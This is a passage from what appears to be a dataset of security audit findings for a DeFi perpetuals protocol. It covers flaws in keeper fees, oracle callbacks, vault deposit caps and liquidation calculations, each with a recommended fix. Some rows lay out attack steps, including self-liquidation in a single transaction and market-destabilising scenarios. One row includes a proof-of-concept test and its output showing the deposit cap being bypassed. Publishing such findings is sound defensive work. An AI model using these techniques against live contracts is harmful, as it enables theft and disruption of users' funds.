call.\\n```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n\\nThis modifier should calculate amount of tokens that should be refunded to user and then raise it. We are interested not in whole modifier, but in calldata handling. To do that we call `_calldataFee` function. This function does nothing in the `Kept` contract and is overrided in the `Kept_Arbitrum` and `Kept_Optimism`.\\nThe problem is that MultiInvoker is only one and it just extends `Keept`. As result his `_calldataFee` function will always return 0, which means that calldata fee will not be added to the refund of keeper.",You need to implement 2 versions of MultiInvoker: for optimism(Kept_Optimism) and arbitrum(Kept_Arbitrum).,Keeper will not be incentivized to execute orders.,"```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n" +It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no cost,medium,"In 2.0 audit the issue 104 was fixed but not fully and it's still possible, in a slightly different way. This wasn't found in the fix review contest. The fix introduced margined and maintained amounts, so that margined amount is higher than maintained one. However, when collateral is withdrawn, only the current (pending) position is checked by margined amount, the largest position (including latest settled) is checked by maintained amount. This still allows to withdraw funds up to the edge of being liquidated, if margined current position amount <= maintained settled position amount. So the new way to liquidate your own position is to reduce your position and then do the same as in 2.0 issue.\\nThis means that it's possible to be at almost liquidation level intentionally and moreover, the current oracle setup allows to open and immediately liquidate your own position in 1 transaction, effectively bypassing efficiency and liquidity removal limits, paying only the keeper (and possible position open/close) fees, causing all kinds of malicious activity which can harm the protocol.\\n`Market._invariant` verifies margined amount only for the current position:\\n```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n\\nAll the other checks (max pending position, including settled amount) are for maintained amount:\\n```\\nif (\\n !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThe user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done only on existing settled position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 1 transaction do the following: 3.1. Reduce your position by `(margin / maintenance)` and make the position you want to liquidate at exactly the edge of liquidation: withdraw maximum allowed amount. Position reduction makes margined(current position) = maintained(settled position), so it's possible to withdraw up to be at the edge of liquidation. 3.2. Commit non-requested oracle version with the price recorded earlier (this price makes the position liquidatable) 3.3. Liquidate your position (it will be allowed, because the position generates a minimum loss due to price change and becomes liquidatable)\\nSince all liquidation fee is given to user himself, liquidation of own position is almost free for the user (only the keeper and position open/close fee is paid if any).","If collateral is withdrawn or order increases position, verify `maxPendingMagnitude` with `margined` amount. If position is reduced or remains unchanged AND collateral is not withdrawn, only then `maxPendingMagnitude` can be verified with `maintained` amount.","There are different malicious actions scenarios possible which can abuse this issue and overcome efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nCombine with the other issues for more severe effect to be able to abuse them in 1 transaction (for example, make `closable = 0` and liquidate your position while increasing to max position size of 2^62-1 - all in 1 transaction)\\nOpen large maker and long or short position, then liquidate maker to cause mismatch between long/short and maker (socialize positions). This will cause some chaos in the market, disbalance between long and short profit/loss and users will probably start leaving such chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from competition.\\nOpen large maker, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high and remaining small maker position will be able to accumulate big profit with a small risk.","```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n" +"Invalid oracle version can cause the `maker` position to exceed `makerLimit`, temporarily or permanently bricking the Market contract",medium,"When invalid oracle version happens, positions pending at the oracle version are invalidated with the following pending positions increasing or decreasing in size. When this happens, all position limit checks are not applied (and can't be cancelled/modified), but they are still verified for the final positions in _invariant. This means that many checks are bypassed during such event. There is a protection against underflow due to this problem by enforcing the calculated `closable` value to be 0 or higher. However, exactly the same problem can happen with overflow and there is no protection against it.\\nFor example:\\nLatest global maker = maker limit = 1000\\nPending global maker = 500 [t=100]\\nPending global maker = 1000 [t=200]\\nIf oracle version at t = 100 is invalid, then pending global maker = 1500 (at t = 200). However, due to this check in _invariant:\\n```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n\\nall Market updates will revert except update to reduce maker position by 500+, which might not be even possible in 1 update depending on maker distribution between users. For example, if 5 users have maker = 300 (1500 total), then no single user can update to reduce maker by 500. This will temporarily brick Market (all updates will revert) until coordinator increases maker limit. If the limit is already close to max possible (2^62-1), then the contract will be bricked permanently (all updates will revert regardless of maker limit, because global maker will exceed 2^62-1 in calculations and will revert when trying to store it).\\nThe same issue can also cause the other problems, such as:\\nBypassing the market utilization limit if long/short is increased above maker\\nUser unexpectedly becomes liquidatable with too high position (for example: position 500 -> pending 0 -> pending 500 - will make current = 1000 if middle oracle version is invalid)","The same issue for underflow is already resolved by using `closable` and enforcing such pending positions that no invalid oracle can cause the position to be less than 0. This issue can be resolved in the same way, by introducing some `opeanable` value (calculated similar to `closable`, but in reverse - when position is increased, it's increased, when position is decreased, it doesn't change) and enforcing different limits, such that settled position + openable:\\ncan not exceed the max maker\\ncan not break utilization\\nfor local position - calculate maxMagnitude amount from `settled + local openable` instead of absolute pending position values for margined/maintained calculations.","If current maker is close to maker limit, and some user(s) reduce their maker then immediately increase back, and the oracle version is invalid, maker will be above the maker limit and the Market will be temporarily bricked until coordinator increases the maker limit. Even though it's temporary, it still bricked for some time and coordinator is forced to increase maker limit, breaking the intended market config. Furthermore, once the maker limit is increased, there is no guarantee that the users will reduce it so that the limit can be reduced back.\\nAlso, for some low-price tokens, the maker limit can be close to max possible value (2^62-1 is about `4*1e18` or Fixed6(4*1e12)). If the token price is about $0.00001, this means such maker limit allows `$4*1e7` or $40M. So, if low-value token with $40M maker limit is used, this issue will lead to maker overflow 2^62-1 and bricking the Market permanently, with all users being unable to withdraw their funds, losing everything.\\nWhile this situation is not very likely, it's well possible. For example, if the maker is close to limit, any maker reducing the position will have some other user immediately take up the freed up maker space, so things like global maker change of: 1000->900->1000 are easily possible and any invalid oracle version will likely cause the maker overflowing the limit.",```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n +"`KeeperOracle.request` adds only the first pair of market+account addresses per oracle version to callback list, ignoring all the subsequent ones",medium,"The new feature introduced in 2.1 is the callback called for all markets and market+account pairs which requested the oracle version. These callbacks are called once the corresponding oracle settles. For this reason, `KeeperOracle` keeps a list of markets and market+account pairs per oracle version to call market.update on them:\\n```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n\\nHowever, currently `KeeperOracle` stores only the market+account from the first request call per oracle version, because if the request was already made, it returns from the function before adding to the list:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n@@@ if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n\\n // @audit only the first request per version reaches these lines to add market+account to callback list\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n}\\n```\\n\\nAccording to docs, the same `KeeperOracle` can be used by multiple markets. And every account requesting in the same oracle version is supposed to be called back (settled) once the oracle version settles.","Move addition to callback list to just before the condition to exit function early:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n}\\n```\\n",The new core function of the protocol doesn't work as expected and `KeeperOracle` will fail to call back markets and accounts if there is more than 1 request in the same oracle version (which is very likely).,```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n +`KeeperOracle.commit` will revert and won't work for all markets if any single `Market` is paused.,medium,"According to protocol design (from KeeperOracle comments), multiple markets may use the same KeeperOracle instance:\\n```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n\\nHowever, if `KeeperOracle` is used by several `Market` instances, and one of them makes a request and is then paused before the settlement, `KeeperOracle` will be temporarily bricked until `Market` is unpaused. This happens, because `KeeperOracle.commit` will revert in market callback, as `commit` iterates through all requested markets and calls `update` on all of them, and `update` reverts if the market is paused.\\nThis means that pausing of just 1 market will basically stop trading in all the other markets which use the same `KeeperOracle`, disrupting protocol usage. When `KeeperOracle.commit` always reverts, it's also impossible to switch oracle provider from upstream `OracleFactory`, because provider switch still requires the latest version of previous oracle to be commited, and it will be impossible to commit it (both valid or invalid, requested or unrequested).\\nAdditionally, the market's `update` can also revert for some other reasons, for example if maker exceeds the maker limit after invalid oracle as described in the other issue.\\nAnd for another problem (although a low severity, but caused in the same lines), if too many markets are authorized to call `KeeperOracle.request`, the markets callback gas usage might exceed block limit, making it impossible to call `commit` due to not enough gas. Currently there is no limit of the amount of Markets which can be added to callback queue.\\n`KeeperOracle.commit` calls back `update` in all markets which called `request` in the oracle version:\\n```\\nfor (uint256 i; i < _globalCallbacks[version.timestamp].length(); i++)\\n _settle(IMarket(_globalCallbacks[version.timestamp].at(i)), address(0));\\n// rest of code\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nIf any `Market` is paused, its `update` function will revert (notice the `whenNotPaused` modifier):\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n```\\n\\nThis means that if any `Market` is paused, all the other markets will be unable to continue trading since `commit` in their oracle provider will revert. It will also be impossible to successfully switch to a new provider for these markets, because previous oracle provider must still `commit` its latest request before fully switching to a new oracle provider:\\n```\\nfunction _latestStale(OracleVersion memory currentOracleLatestVersion) private view returns (bool) {\\n if (global.current == global.latest) return false;\\n if (global.latest == 0) return true;\\n\\n@@@ if (uint256(oracles[global.latest].timestamp) > oracles[global.latest].provider.latest().timestamp) return false;\\n if (uint256(oracles[global.latest].timestamp) >= currentOracleLatestVersion.timestamp) return false;\\n\\n return true;\\n}\\n```\\n","Consider catching and ignoring revert, when calling `update` for the market in the `_settle` (wrap in try .. catch).\\nConsider adding a limit of the number of markets which are added to callback queue in each oracle version, or alternatively limit the number of authorized markets to call `request`.",One paused market will stop trading in all the markets which use the same oracle provider (KeeperOracle).,```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n +Vault `_maxDeposit` incorrect calculation allows to bypass vault deposit cap,medium,"Vault has a deposit cap risk setting, which is the max amount of funds users can deposit into the vault. The problem is that `_maxDeposit` function, which calculates max amount of assets allowed to be deposited is incorrect and always includes vault claimable assets even when the vault is at the cap. This allows malicious (or even regular) user to deposit unlimited amount bypassing the vault cap, if the vault has any assets redeemed but not claimed yet. This breaks the core protocol function which limits users risk, for example when the vault is still in the testing phase and owner wants to limit potential losses in case of any problems.\\n`Vault._update` limits the user deposit to `_maxDeposit()` amount:\\n```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n\\nWhen calculating max deposit, the vault's collateral consists of vault assets as well as assets which are redeemed but not yet claimed. However, the formula used to calculate max deposit is incorrect, it is:\\n`maxDeposit = claimableAssets + (cap - min(collateral, cap))`\\nAs can be seen from the formula, regardless of cap and current collateral, maxDeposit will always be at least claimableAssets, even when the vault is already at the cap or above cap, which is apparently wrong. The correct formula should subtract claimableAssets from collateral (or 0 if claimableAssets is higher than collateral) instead of adding it to the result:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nCurrent incorrect formula allows to deposit up to claimable assets amount even when the vault is at or above cap. This can either be used by malicious user (user can deposit up to cap, redeem, deposit amount = up to cap + claimable, redeem, ..., repeat until target deposit amount is reached) or can happen itself when there are claimable assets available and vault is at the cap (which can easily happen by itself if some user forgets to claim or it takes long time to claim).\\nBypass of vault cap is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('bypass vault deposit cap', async () => {\\n console.log(""start"");\\n\\n await vault.connect(owner).updateParameter({\\n cap: parse6decimal('100'),\\n });\\n\\n await updateOracle()\\n\\n var deposit = parse6decimal('100')\\n console.log(""Deposit 100"")\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(""Vault assets: "" + assets);\\n\\n // additional deposit reverts due to cap\\n var deposit = parse6decimal('10')\\n console.log(""Deposit 10 revert"")\\n await expect(vault.connect(user).update(user.address, deposit, 0, 0)).to.be.reverted;\\n\\n // now redeem 50\\n var redeem = parse6decimal('50')\\n console.log(""Redeem 50"")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(""Vault assets: "" + assets);\\n\\n // deposit 100 (50+100=150) doesn't revert, because assets = 50\\n var deposit = parse6decimal('100')\\n console.log(""Deposit 100"")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(""Vault assets: "" + assets);\\n\\n var deposit = parse6decimal('50')\\n console.log(""Deposit 50"")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(""Vault assets: "" + assets);\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nDeposit 100\\nVault assets: 100000000\\nDeposit 10 revert\\nRedeem 50\\nVault assets: 50000000\\nDeposit 100\\nVault assets: 150000000\\nDeposit 50\\nVault assets: 200000000\\n```\\n\\nThe vault cap is set to 100 and is then demonstrated that it is bypassed and vault assets are set at 200 (and can be continued indefinitely)","The correct formula to `_maxDeposit` should be:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nSo the code can be:\\n```\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.parameter.cap.sub(collateral.sub(context.global.assets.min(collateral)).min(context.parameter.cap));\\n}\\n```\\n","Malicious and regular users can bypass vault deposit cap, either intentionally or just in the normal operation when some users redeem and claimable assets are available in the vault. This breaks core contract security function of limiting the deposit amount and can potentially lead to big user funds loss, for example at the initial stages when the owner still tests the oracle provider/market/etc and wants to limit vault deposit if anything goes wrong, but gets unlimited deposits instead.",```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n +Pending keeper and position fees are not accounted for in vault collateral calculation which can be abused to liquidate vault when it's small,medium,"Vault opens positions in the underlying markets trying to keep leverage at the level set for each market by the owner. However, it uses sum of market collaterals which exclude keeper and position fees. But pending fees are included in account health calculations in the `Market` itself.\\nWhen vault TVL is high, this difference is mostly unnoticable. However, if vault is small and keeper fee is high enough, it's possible to intentionally add keeper fees by depositing minimum amounts from different accounts in the same oracle version. This keeps/increases vault calculated collateral, but its pending collateral in underlying markets reduces due to fees, which increases actual vault leverage, so it's possible to increase vault leverage up to maximum leverage possible and even intentionally liquidate the vault.\\nEven when the vault TVL is not low but keeper fee is large enough, the other issue reported allows to set vault leverage to max (according to margined amount) and then this issue allows to reduce vault collateral even further down to maintained amount and then commit slightly worse price and liquidate the vault.\\nWhen vault leverage is calculated, it uses collateral equal to sum of collaterals of all markets, loaded as following:\\n```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n\\nHowever, market's `local.collateral` excludes pending keeper and position fees. But pending fees are included in account health calculations in the `Market` itself (when loading pending positions):\\n```\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n// rest of code\\n if (protected && (\\n !context.closable.isZero() || // @audit-issue even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n@@@ context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n )) revert MarketInvalidProtectionError();\\n// rest of code\\n if (\\n@@@ !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMarginError();\\n\\n if (\\n@@@ !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThis means that small vault deposits from different accounts will be used for fees, but these fees will not be counted in vault underlying markets leverage calculations, allowing to increase vault's actual leverage.",Consider subtracting pending fees when loading underlying markets data context in the vault.,"When vault TVL is small and keeper fees are high enough, it's possible to intentionally increase actual vault leverage and liquidate the vault by creating many small deposits from different user accounts, making the vault users lose their funds.","```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n" +`MultiInvoker._latest` will return `latestPrice = 0` when latest oracle version is invalid causing liquidation to send 0 fee to liquidator or incorrect order execution,medium,"There was a slight change of oracle versions handling in 2.1: now each requested oracle version must be commited, either as valid or invalid. This means that now the latest version can be invalid (price = 0). This is handled correctly in `Market`, which only uses timestamp from the latest oracle version, but the price comes either from latest version (if valid) or `global.latestPrice` (if invalid).\\nHowever, `MultiInvoker` always uses price from `oracle.latest` without verifying if it's valid, meaning it will return `latestPrice = 0` if the latest oracle version is invalid. This is returned from the `_latest` function.\\nSuch latest price = 0 leads to 2 main problems:\\nLiquidations orders in MultiInvoker will send 0 liquidation fee to liquidator (will liquidate for free)\\nSome TriggerOrders will trigger incorrectly (canExecuteOrder will return true when the real price didn't reach the trigger price, or false even if the real prices reached the trigger price)\\n`MultiInvoker._latest` has the following code for latest price assignment:\\n```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n\\nThis `latestPrice` is what's returned from the `_latest`, it isn't changed anywhere else. Notice that there is no check for latest oracle version validity.\\nAnd this is the code for KeeperOracle._commitRequested:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nNotice that commits made outside the timeout window simply increase `_global.latestIndex` without assigning `_prices`, meaning it remains 0 (invalid). This means that latest oracle version will return price=0 and will be invalid if commited after the timeout from request time has passed.\\nPrice returned by `_latest` is used when calculating liquidationFee:\\n```\\nfunction _liquidationFee(IMarket market, address account) internal view returns (Position memory, UFixed6, UFixed6) {\\n // load information about liquidation\\n RiskParameter memory riskParameter = market.riskParameter();\\n@@@ (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) = _latest(market, account);\\n\\n // create placeholder order for liquidation fee calculation (fee is charged the same on all sides)\\n Order memory placeholderOrder;\\n placeholderOrder.maker = Fixed6Lib.from(closableAmount);\\n\\n return (\\n latestPosition,\\n placeholderOrder\\n@@@ .liquidationFee(OracleVersion(latestPosition.timestamp, latestPrice, true), riskParameter)\\n .min(UFixed6Lib.from(market.token().balanceOf(address(market)))),\\n closableAmount\\n );\\n}\\n```\\n\\n`liquidationFee` calculation in order multiplies order size by `latestPrice`, meaning it will be 0 when price = 0. This liquidation fee is then used in `market.update` for liquidation fee to receive by liquidator:\\n```\\n function _liquidate(IMarket market, address account, bool revertOnFailure) internal isMarketInstance(market) {\\n@@@ (Position memory latestPosition, UFixed6 liquidationFee, UFixed6 closable) = _liquidationFee(market, account);\\n Position memory currentPosition = market.pendingPositions(account, market.locals(account).currentId);\\n currentPosition.adjust(latestPosition);\\n\\n try market.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n@@@ Fixed6Lib.from(-1, liquidationFee),\\n true\\n```\\n\\nThis means liquidator will receive 0 fee for the liquidation.\\nIt is also used in canExecuteOrder:\\n```\\n function _executeOrder(address account, IMarket market, uint256 nonce) internal {\\n if (!canExecuteOrder(account, market, nonce)) revert MultiInvokerCantExecuteError();\\n// rest of code\\n function canExecuteOrder(address account, IMarket market, uint256 nonce) public view returns (bool) {\\n TriggerOrder memory order = orders(account, market, nonce);\\n if (order.fee.isZero()) return false;\\n@@@ (, Fixed6 latestPrice, ) = _latest(market, account);\\n@@@ return order.fillable(latestPrice);\\n }\\n```\\n\\nMeaning `canExecuteOrder` will do comparision with price = 0 instead of real latest price. For example: limit buy order to buy when price <= 1000 (when current price = 1100) will trigger and execute buy at the price = 1100 instead of 1000 or lower.","`_latest` should replicate the process for the latest price from `Market` instead of using price from the oracle's latest version:\\nif the latest oracle version is valid, then use its price\\nif the latest oracle version is invalid, then iterate all global pending positions backwards and use price of any valid oracle version at the position.\\nif all pending positions are at invalid oracles, use market's `global.latestPrice`","liquidation done after invalid oracle version via `MultiInvoker` `LIQUIDATE` action will charge and send 0 liquidation fee from the liquidating account, thus liquidator loses these funds.\\nsome orders with comparison of type -1 (<= price) will incorrectly trigger and will be executed when price is far from reaching the trigger price. This loses user funds due to unexpected execution price of the pending order.",```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n +`MultiInvoker._latest` calculates incorrect closable for the current oracle version causing some liquidations to revert,medium,"`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. There is one tricky edge case at the current oracle version which is calculated incorrectly in `MultiInvoker` (and also in Vault). This happens when pending position is updated in the current active oracle version: it is allowed to set this current position to any value conforming to `closable` of the previous pending (or latest) position. For example:\\nlatest settled position = 10\\nuser calls update(20) - pending position at t=200 is set to 20. If we calculate `closable` normally, it will be 10 (latest settled position).\\nuser calls update(0) - pending position at t=200 is set to 0. This is valid and correct. It looks as if we've reduced position by 20, bypassing the `closable` = 10 value, but in reality the only enforced `closable` is the previous one (for latest settled position in the example, so it's 10) and it's enforced as a change from previous position, not from current.\\nNow, if the step 3 happened in the next oracle version, so 3. user calls update(0) - pending position at t=300 will revert, because user can't close more than 10, and he tries to close 20.\\nSo in such tricky edge case, `MultiInvoker` (and Vault) will calculate `closable = 10` and will try to liquidate with position = 20-10 = 10 instead of 0 and will revert, because `Market._invariant` will calculate `closable = 10` (latest = 10, pending = 10, closable = latest = 10), but it must be 0 to liquidate (step 3. in the example above)\\nIn `Vault` case, this is less severe as the market will simply allow to redeem and will close smaller amount than it actually can.\\nWhen `Market` calculates `closable`, it's calculated starting from latest settled position up to (but not including) current position:\\n```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n\\nPay attention to `id < context.local.currentId` - the loop doesn't include currentId.\\nAfter the current position is updated to a new user specified value, only then the current position is processed and closable now includes new user position change from the previous position:\\n```\\nfunction _update(\\n // rest of code\\n // load\\n _loadUpdateContext(context, account);\\n // rest of code\\n context.currentPosition.local.update(collateral);\\n // rest of code\\n // process current position\\n _processPendingPosition(context, context.currentPosition.local);\\n // rest of code\\n // after\\n _invariant(context, account, newOrder, collateral, protected);\\n```\\n\\nThe `MultiInvoker._latest` logic is different and simply includes calculation of `closable` for all pending positions:\\n```\\nfor (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n}\\n```\\n\\nThe same incorrect logic is in a Vault:\\n```\\n// pending positions\\nfor (uint256 id = marketContext.local.latestId + 1; id <= marketContext.local.currentId; id++)\\n previousClosable = _loadPosition(\\n marketContext,\\n marketContext.currentAccountPosition = registration.market.pendingPositions(address(this), id),\\n previousClosable\\n );\\n```\\n","When calculating `closable` in `MultiInvoker` and `Vault`, add the following logic:\\nif timestamp of pending position at index currentId equals current oracle version, then add the difference between position size at currentId and previous position size to `closable` (both when that position increases and decreases).\\nFor example, if\\nlatest settled position = `10`\\npending position at t=200 = 20 then initialize `closable` to `10` (latest) add (pending-latest) = (20-10) to `closable` (closable = 20)","In the following edge case:\\ncurrent oracle version = oracle version of the pending position in currentId index\\nAND this (current) pending position increases compared to previous pending/settled position\\nThe following can happen:\\nliquidation via `MultiInvoker` will revert (medium impact)\\nvault's `maxRedeem` amount will be smaller than actual allowed amount, position will be reduced by a smaller amount than they actually can (low impact)","```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n" +MultiInvoker closableAmount the calculation logic is wrong,medium,"in `MultiInvoker._latest()` The incorrect use of `previousMagnitude = latestPosition.magnitude()` has led to an error in the calculation of `closableAmount`. This has caused errors in judgments that use this variable, such as `_liquidationFee()`.\\nThere are currently multiple places where the user's `closable` needs to be calculated, such as `market.update()`. The calculation formula is as follows in the code: `Market.sol`\\n```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n 